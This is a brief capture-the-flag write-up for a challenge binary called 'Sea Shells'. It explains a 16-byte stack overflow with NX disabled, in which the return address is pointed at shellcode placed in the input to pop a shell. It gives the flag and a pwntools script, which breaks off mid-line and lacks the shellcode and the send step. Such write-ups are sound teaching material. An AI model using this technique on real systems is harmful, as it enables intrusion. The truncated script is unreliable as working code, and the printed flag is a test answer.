Sea Shells

The binary prints the address of our input, then uses read to read input into it. There's 16 bytes of buffer overflow, letting us overwrite rbp and the return address only. As NX is off and our input is on the stack, we can just set the return address to our input, and then put shellcode in our input. After popping a shell, we cat flag.txt to get the flag.

Flag: flag{popping_shells_by_the_sea_shore}

from pwn import *
context.arch = 'amd64'
e = ELF("./seashells")
p = e.process() if args.LOCAL else remote('', 32134)
addr = int(p.recvline(),16)
sc = asm(
payload = fit({0: sc, 0x88: addr})

Last updated